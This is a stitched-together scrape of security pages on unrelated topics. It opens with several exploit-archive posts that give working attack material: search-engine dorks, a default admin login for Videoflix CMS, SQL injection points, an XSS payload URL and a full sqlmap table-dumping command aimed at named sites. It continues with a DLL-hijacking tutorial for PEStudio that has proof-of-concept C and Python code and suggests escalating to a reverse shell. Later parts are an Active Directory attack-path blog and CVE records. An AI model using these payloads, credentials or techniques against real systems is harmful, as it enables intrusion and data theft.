Videoflix CMS version 1.3 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Videoflix Cms v1.3 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://codecanyon.net/item/videoflix-tv-series-movie-subscription-portal-cms/20839016                             |  | # Dork      : "Made with by Vmax-Studio."                                                                                        |====================================================================================================================================poc : [+] Dorking İn Google Or Other Search Enggine .[+] Users : login email : admin@videoflix.com, password : abcdefg [+] http://arabflixcom/index.php?admin/dashboardGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Videoflix CMS 1.3 Insecure Settings

Virtues cpanelCMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Virtues cpanelCMS v1.0 sql injection Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.virtues.ag/                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /index/noticia_integra.php?id_clipping=[+] http://wospluralorg/index/noticia_integra.php?id_clipping= inject herGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Virtues cpanelCMS 1.0 SQL Injection

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

**Voodoo Chat 1.3 Cross Site Scripting**

Posted Aug 8, 2023

Authored by indoushka

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 11f7a2efbdf14e9500b0a6e971a896bbac171caeed20cc661f2b4ad1b5c02e2e

Download | Favorite | View

**Voodoo Chat 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Voodoo Chat v1.3 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.swalif.net/softs/swalif30/softs258256/#post1850068                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0[+] http://127.0.0.1/groupsyriacom/chat/pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Voodoo Chat 1.3 Cross Site Scripting

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

**eneblur CMS 1.0 SQL Injection**

Posted Aug 8, 2023

Authored by indoushka

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 4d67639c944054e33175ed2e55a36b45439dd449f6e73134fe454cc1d6a7bb71

Download | Favorite | View

**eneblur CMS 1.0 SQL Injection**

    ====================================================================================================================================| # Title     : eneblur CMS 1.0 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://www.eneblur.com/web-application-development.php                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /journal_details.php?jid= <===== inject here [+] D:\sqlmap>sqlmap.py -u http://127.0.0.1/wenvirobiotechjournalscom/journal_details.php?jid=3 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D envirobi_portal_server3Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eneblur CMS 1.0 SQL Injection

CMS BMGI International version 4.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS BMGI International v 4.0 Sql injection Vulnerability                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://batel.net/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] inject here : /_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisv[+] http://127.0.0.1/scimatdz/_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisvGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS BMGI International 4.0 SQL Injection

An issue in PEStudio v.9.52 allows a remote attacker to execute arbitrary code via a crafted DLL file to the PESstudio exeutable.

Lately, I have reported multiple DLL Hijacking vulnerabilities. These are quite straightforward, yet quite impactful. Thus, I thought of sharing some theory as well as a practical example of DLL Hijacking (how exciting, right?). This is YADHA (Yet Another DLL Hijacking Article)!

1.  DLL Hijacking Theory
    1.  Let’s Look at the Win32 API LoadLibraryA Function
2.  How to Find DLL Hijacking Vulnerabilities?
3.  Creating the Exploit
4.  Impact

**DLL Hijacking Theory**

In the simplest terms, DLL Hijacking, also known as DLL side-loading, is an attack that exploits the way Windows searches for and loads DLL files, allowing an attacker to replace a legitimate DLL with a malicious one, leading to unauthorized code execution. This can happen due to various reasons, such as:

*   Incorrect DLL search order: Windows searches for DLLs in specific locations, such as the current directory or system folders. If an application does not specify the DLL’s full path, an attacker can place a malicious DLL in a directory with higher search priority, leading to the hijacking.

*   Weak or missing DLL loading safeguards: Applications may not implement sufficient security measures to validate the integrity and authenticity of DLL files, making them susceptible to substitution by malicious counterparts.

**Let’s Look at the Win32 API LoadLibraryA Function**

LoadLibraryA loads the specified module into the address space of the calling process. The specified module may cause other modules to be loaded (see https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya).

The screenshot above, highlights the essence of the issue by noting that if the string specifies a full path, the function searches only that path for the module, however, if the string specifies a relative path or a module name without a path, the function uses a standard search strategy to find the module. This is interesting, because it highlights a neat fix to the DLL Hijacking issue – specifying full paths to the modules.

This article (https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security) gives us some more insight into the load order. Assuming safe DLL search mode is enabled and the application is not using an alternate search order, the system searches directories in the following order:

1.  The directory from which the application loaded.
2.  The system directory.
3.  The 16-bit system directory.
4.  The Windows directory.
5.  The current directory.
6.  The directories that are listed in the PATH environment variable.

In other words, if the DLL is located in the directory form which the application is loaded, the application will stop searching the other directories for the module. Thus, if we can write to the search directories, we can manipulate the DLLs which are loaded.

**How to Find DLL Hijacking Vulnerabilities?**

Feel free to follow along with this section!

Let’s take the example of PEStudio 9.52. We can download PEStudio 9.52 from the following link: https://www.winitor.com/download2. In order to find DLL Hijacking vulnerabilities, we will need Procmon – a fantastic utility which is part of Microsoft’s SysInternals Suite (https://download.sysinternals.com/files/SysinternalsSuite.zip).

With our vulnerable application (PEStudio 9.52) and our tools (SysInternals Suite) downloaded, we are ready to start! The first step is to run Procmon64.exe and set the following filters:

We are looking for DLLs which are attempted to be loaded by pestudio.exe and are not found. Now that we started capturing using the filters above, we can start PEStudio. It isn’t long before we get the following results in Procmon:

This indicates that the 6 DLLs are attempted to be loaded from the directory from which the application is loaded. Let’s take sensapi.dll as an example for further inspection – by changing the _Path ends with_ filter from “.dll” to “sensapi.dll”. We now find that pestudio.exe tries to load sensapi.dll from the directory from which the application is loaded, fails, and then loads it from System32.

Thus, if we are able to write our own malicious version of sensapi.dll into the pestudio folder, we may be able to run arbitrary commands on the system.

**Creating the Exploit**

Let’s take the following Proof of Concept C code (dll\_hijack.c):

    #include <windows.h>
    #pragma comment (lib, "user32.lib")
    
    BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
        switch (ul_reason_for_call)  {
        case DLL_PROCESS_ATTACH:
          MessageBox(
            NULL,
            "DLL Hijack!",
            "PoC",
            MB_OK
          );
          break;
        case DLL_PROCESS_DETACH:
          break;
        case DLL_THREAD_ATTACH:
          break;
        case DLL_THREAD_DETACH:
          break;
        }
        return TRUE;
    }

This piece of code should generate a message box. Of course, this is a benign PoC, however, the potential for malicious code is only limited by the attacker’s imagination.

Let’s also create the following Python script (dll\_def.py):

    import pefile
    import sys
    import os.path
    
    dll = pefile.PE(sys.argv[1])
    dll_basename = os.path.splitext(sys.argv[1])[0]
    
    try:
        with open(sys.argv[1].split("/")[-1].replace(".dll", ".def"), "w") as f:
            f.write("EXPORTS\n")
            for export in dll.DIRECTORY_ENTRY_EXPORT.symbols:
                if export.name:
                    f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal))
    except:
        print ("Failed to create .def file :(")
    else:
        print ("Successfully created .def file :)")

The Python script was inspired by https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html. The script enumerates the exported functions from a DLL. The reason for this will soon become clear.

We must first find the original DLL and transfer it to our attack box.

Then, we must find the functions exported by the initial DLL and create a .def file using the Python scrip shared above. We must use this .def file when compiling our C PoC, because otherwise there is a chance that our DLL will not be loaded due to missing procedures or entry points. After cross compiling the DLL (we are creating a Windows-specific file on a Linux system), we must transfer the resulting DLL onto the Windows system.

We then place poc.dll into the same folder as pestudio.exe and rename it to sensapi.dll. Now, when we run pestudio.exe, we see that our DLL was loaded and generated a message box. Once we click OK, pestudio runs normally.

**Impact**

Generally speaking, DLL Hijacking can allow attackers to run arbitrary commands on the victim’s system. In some cases, DLL Hijacking is used for privilege escalation, however, this is not the case for PEStudio, because I don’t see any reason to run PEStudio as admin. Nevertheless, application developers should take security into account and provide full paths to loaded modules in order to avoid these types of attacks. I encourage you to try to exploit this vulnerability in PEStudio to cause a reverse shell or create a user, but also to try to find these types of vulnerabilities in other applications, as I get the sense that there are a lot more of them than reported.

CVE-2023-36546: DLL Hijacking – Finding CVE-2023-36546 in PEStudio 9.52

Introduced in 1999, Microsoft Active Directory is the default identity and access management service in Windows networks, responsible for assigning and enforcing security policies for all network endpoints. With it, users can access various resources across networks. As things tend to do, times, they are a'changin' – and a few years back, Microsoft introduced Azure Active Directory, the

Introduced in 1999, Microsoft Active Directory is the default identity and access management service in Windows networks, responsible for assigning and enforcing security policies for all network endpoints. With it, users can access various resources across networks. As things tend to do, times, they are a'changin' – and a few years back, Microsoft introduced Azure Active Directory, the cloud-based version of AD to extend the AD paradigm, providing organizations with an Identity-as-a-Service (IDaaS) solution across both the cloud and on-prem apps. (Note that as of July 11th 2023, this service was renamed to _Microsoft Entra ID_, but for the sake of simplicity, we'll refer to it as Azure AD in this post)

Both Active Directory and Azure AD are critical to the functioning of on-prem, cloud-based, and hybrid ecosystems, playing a key role in uptime and business continuity. And with 90% of organizations using the service for employee authentication, access control and ID management, it has become the keys to the proverbial castle.

**Active Directory, Actively Problematic**

But as central as it is, Active Directory security posture is often woefully lacking.

Let's take a quick peek at how Active Directory assigns users, which will shed some light on why this tool has some shall we say, issues, associated with it.

At the core, what Active Directory does is establish groups that have roles and authorizations associated with them. Users are assigned a username and password, which is then linked to their Active Directory Account Object. Using Lightweight Directory Access Protocol, passwords are verified as correct or incorrect and the usergroup is also verified. In general, users are assigned to the Domain User group and will be granted access to the objects that domain users have authorization to access. Then there are Admins – these are users assigned to the Domain Admins group. This group is highly privileged and is thus authorized to perform any actions in the network.

With such potentially potent capabilities, it's super critical to ensure that Active Directory is managed and configured optimally. Issues like missed patches, poor access management and misconfigurations can allow attackers to access even the most sensitive systems, which can have dire consequences.

In 2022, our in-house research found that 73% of the top attack techniques used in the compromising of critical assets involved mismanaged or stolen credentials – and more than half of the attacks in organizations include some element of Active Directory compromise. And once they have a foothold in Active Directory, attackers can perform loads of different malicious actions like:

*   Hiding activity in the network
*   Executing malicious code
*   Elevating privileges
*   Getting into the cloud environment to compromise critical assets

Point is, if you don't know what's happening in your Active Directory, and if you're lacking the proper processes and security controls, you're likely leaving the door wide open to attackers.

**Download our latest research report, and discover**

*   How many steps it takes for attackers to typically compromise your critical assets
*   Top exposures and hygiene issues that form attack paths
*   Key findings related to attacks across hybrid, on-prem or multi-cloud networks.

**Active Directory Attack Paths**

From an attacker's POV, Active Directory serves as a great opportunity for conducting lateral movement, as gaining that initial access allows them to move from a low-privileged user to a more valuable target – or even to fully take over – by exploiting misconfigurations or overly excessive permissions.

So now let's take a look into the anatomy of 3 actual Active Directory attack paths and see how attackers made their way through this environment.

Here is an attack path we came across in one of our customer's environment:

The organization was deeply committed to hardening their security posture but Active Directory was a blind spot. In this case, all authenticated users – essentially any users at all – in the domain had been accidentally granted the right to reset passwords. So if an attacker took over one Active Directory user via phishing or other social engineering techniques, they could then reset any passwords for other users and take over any account in the domain.Once they saw this, they finally understood their Active Directory security approach needed to level-up so they locked down and hardened their security practices.

Here's another one from one of our customer's Active Directory;

We uncovered an attack path using the authenticated users group with permissions to change the GPO policy's gPCFileSysPath to a path with malicious policies.

One of the affected objects was the AD User Container, with a child object that was a user which was part of the Domain Admin group. Any user in the domain could get Domain Admin permissions -- all they needed was one non-privileged user to fall prey to a phishing email to compromise the entire domain. This could have led to a complete compromise of their domain.

Ready for one more? Here it is:

This one starts with an attacker infiltrating an enterprise environment via phishing mail that when opened, executed code using a vulnerability on an unpatched machine. The next step exploited the compromised Active Directory user's local and domain credentials through credential dumping techniques. The attacker then had the permissions to add themselves to a group so they could add the compromised Active Directory user to an Active Directory helpdesk group.

The helpdesk group had the Active Directory permissions to reset other users passwords and at this stage, the attacker could reset a password to another user, preferably an old, out of use admin. Now that they were an admin, they could perform lots of harmful activities in the network, such as running malicious code by adding a script logon to other users in Active Directory.

These are just some relatively simple ways attackers make their way across Active Directory environments. By understanding these actual real-world attack paths, organizations can start to see what their Active Directory and AD Azure environments look like from the attacker's point of view.

**Watch on-demand How To Overcome Active Directory Exploits And Prevent Attacks to learn:**

*   How Active Directory (AD) exposures combined with other attack techniques form attack paths
*   What kind of actions the attacker can perform once they compromise an AD user
*   What to do for better Active Directory Security

**Conclusion**

Looking at attack paths can help shore up these potentially tricky environments. By getting a comprehensive view of the attack paths that exist in Active Directory across on-prem and cloud environments, organizations can learn how attackers move laterally with a context-based understanding of their environment – giving them visibility into how issues can combine to facilitate attacks and impersonate users, escalate privileges, and gain access to cloud environments.

With this understanding, organizations can prioritize what really needs fixing and harden environments to prevent Active Directory weaknesses from being leveraged by threat actors.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Understanding Active Directory Attack Paths to Improve Security

In MongoDB Ops Manager v5.0 prior to 5.0.22 and v6.0 prior to 6.0.17 it is possible for an authenticated user with project owner or project user admin access to generate an API key with the privileges of org owner resulting in privilege escalation.


CVE-2023-4009: Ops Manager Server Changelog — MongoDB Ops Manager 5.0

**Why is this AMD CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in certain processor models offered by AMD. The mitigation for this vulnerability requires a Windows update. This CVE is being documented in the Security Update Guide to announce that the latest builds of Windows enable the mitigation and provide protection against the vulnerability.

Please see the following for more information:

*   AMD-SB-7005

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

A side channel vulnerability on some of the AMD CPUs may allow an attacker to influence the return address prediction. This may result in speculative execution at an attacker-controlled address, potentially leading to information disclosure.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   MISC:https://www.amd.com/en/corporate/product-security/bulletin/AMD-SB-7005
*   URL:https://www.amd.com/en/corporate/product-security/bulletin/AMD-SB-7005

Assigning CNA

Advanced Micro Devices Inc.

Date Record Created

**20221027**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221027)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is an record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-20569: AMD: CVE-2023-20569 Return Address Predictor

**What privileges could be gained by an attacker who successfully exploited this vulnerability?**

An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20230712**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230712)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is an record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

Tag

#windows